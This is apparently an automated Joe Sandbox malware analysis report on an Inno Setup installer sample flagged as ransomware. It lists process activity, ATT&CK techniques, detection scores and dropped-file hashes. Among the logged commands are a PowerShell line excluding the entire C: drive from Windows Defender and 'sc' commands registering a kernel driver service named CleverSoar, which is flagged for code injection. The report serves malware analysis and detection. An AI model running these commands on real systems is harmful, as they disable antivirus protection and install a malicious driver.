Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2CA720 cpuid 6_2_6C2CA720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CFAB2A GetSystemTimeAsFileTime,10_2_00CFAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D90090 GetVersion,10_2_00D90090

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory421
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580559 Sample: yvaKqhmD4L.exe Startdate: 25/12/2024 Architecture: WINDOWS Score: 96 92 Multi AV Scanner detection for dropped file 2->92 94 Multi AV Scanner detection for submitted file 2->94 96 Found driver which could be used to inject code into processes 2->96 98 3 other signatures 2->98 10 yvaKqhmD4L.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 88 C:\Users\user\AppData\...\yvaKqhmD4L.tmp, PE32 10->88 dropped 19 yvaKqhmD4L.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 74 C:\Users\user\AppData\Local\...\update.vbc, PE32 19->74 dropped 76 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->76 dropped 100 Adds a directory exclusion to Windows Defender 19->100 35 yvaKqhmD4L.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 78 C:\Users\user\AppData\...\yvaKqhmD4L.tmp, PE32 35->78 dropped 55 yvaKqhmD4L.tmp 4 15 35->55         started        102 Loading BitLocker PowerShell Module 38->102 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 80 C:\Users\user\AppData\Local\...\update.vbc, PE32 55->80 dropped 82 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->82 dropped 84 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->84 dropped 86 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->86 dropped 104 Query firmware table information (likely to detect VMs) 55->104 106 Protects its processes via BreakOnTermination flag 55->106 108 Hides threads from debuggers 55->108 110 Contains functionality to hide a thread from the debugger 55->110 63 7zr.exe 2 55->63         started        66 7zr.exe 7 55->66         started        68 Conhost.exe 55->68         started        signatures13 process14 file15 90 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->90 dropped 70 conhost.exe 63->70         started        72 conhost.exe 66->72         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
yvaKqhmD4L.exe12%VirustotalBrowse
yvaKqhmD4L.exe5%ReversingLabsWin32.Ransomware.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc26%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc38%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc26%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc38%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp2%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbc26%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUyvaKqhmD4L.exefalse
    		high
    https://www.remobjects.com/psyvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.drfalse
      		high
      https://www.innosetup.com/yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580559
        Start date and time:2024-12-25 07:51:29 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 24s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:yvaKqhmD4L.exe
        renamed because original name is a hash value
        Original Sample Name:DEF808BED70D77EC70F201B7F9EDC125295D26128DF9E7E1796311742FC0D00A.exe
        Detection:MAL
        Classification:mal96.evad.winEXE@128/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 121
        • Number of non-executed functions: 103
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

        Warnings

        • Exclude process from analysis (whitelisted): SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 4.175.87.197
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
                          C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
                                      #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeGet hashmaliciousUnknownBrowse
                                        #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exeGet hashmaliciousUnknownBrowse
                                          #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse

                                            Created / dropped Files

                                            C:\Program Files (x86)\Windows NT\7zr.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):831200
                                            Entropy (8bit):6.671005303304742
                                            Encrypted:false
                                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            Joe Sandbox View:
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                                            C:\Program Files (x86)\Windows NT\file.dat (copy)

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528529
                                            Encrypted:true
                                            SSDEEP:49152:C9rTE8S5idrQh2Xab/c0wU9/FE6HchcDQb809:C9rT4elr+/GKceDs809
                                            MD5:A5D59F9E5E103C7D459C9A066156C027
                                            SHA1:EEC38E0CDFFC853F444D8D44B98C360016818D37
                                            SHA-256:EFBD385F8A8C154A5BABC3BD4CD7FC45C9C838BFFE1E0CA11E7B136F2E8E3C04
                                            SHA-512:28A92FD2EFFB559F073D6A853C66EF9371B9EEB18C8629896134F84384D5439FAC7B11EFDF36DD7A3DBFAB455704A50F3B63EB5574E3B3BF5B4DAC05B319EB85
                                            Malicious:false
                                            Preview:.@S.......=.o..................]..j...9Nu....1...#... .B4.R...;.I...P.f...Q.+..$...q...!......@.^fS..yw2.5.`GSH.C.W..B..y..S...^.&.N.U..u..{Y..T*.9..[.=!*......Q...;.|...t.../NJ|K....#..&6Y...{.%.)..C;.....).6./._...a.r3.hdEE/../%X..;:..BHMO.^..+s....x5_=T9........e...C.4@OM...I.Ypz.U.}.`..EH..`W-....9g......m...5...8..Q.~..UAJ@.T&.h.S..m..T./Oa[xb..`.;1.... ...,#.;...^.a.pD.....1^....E(e.z.7...;........Q.K.....p.... ..M??Q_..U.\O..W..)..fI...&...::r.A).....P"....(sV..ma.I*.17D..4....x.%....\.m...k.`U+.*.u. a...R`!.}...d.+..*...Ij.i..\..<...i.> ../.Wm(.H..b&.!.....5x[....H=bY.....+......6...~........A}...`.O\{....<.T-.... a.\..t....,.....,......R.3Q....).p.9b.k:.~..........)[..g..*.R..w.... .Yx...\yXd+.Ly3mW0.../......E...O.erN.9.:..4.w...=......>HU.....bi.....=R'.>.........B.......;...7.......m..b....a..=.az.dN..6R...J7.qnRM..S..iU.@.. _wY.fC..:..O.....o.h..;.....>*..M.........].7?..H..*....][.../9n.\...i.T....,.....i..oF.....3....oH.C.T

                                            C:\Program Files (x86)\Windows NT\hrsw.vbc

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                            Joe Sandbox View:
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                            C:\Program Files (x86)\Windows NT\is-LQQ5K.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528529
                                            Encrypted:true
                                            SSDEEP:49152:C9rTE8S5idrQh2Xab/c0wU9/FE6HchcDQb809:C9rT4elr+/GKceDs809
                                            MD5:A5D59F9E5E103C7D459C9A066156C027
                                            SHA1:EEC38E0CDFFC853F444D8D44B98C360016818D37
                                            SHA-256:EFBD385F8A8C154A5BABC3BD4CD7FC45C9C838BFFE1E0CA11E7B136F2E8E3C04
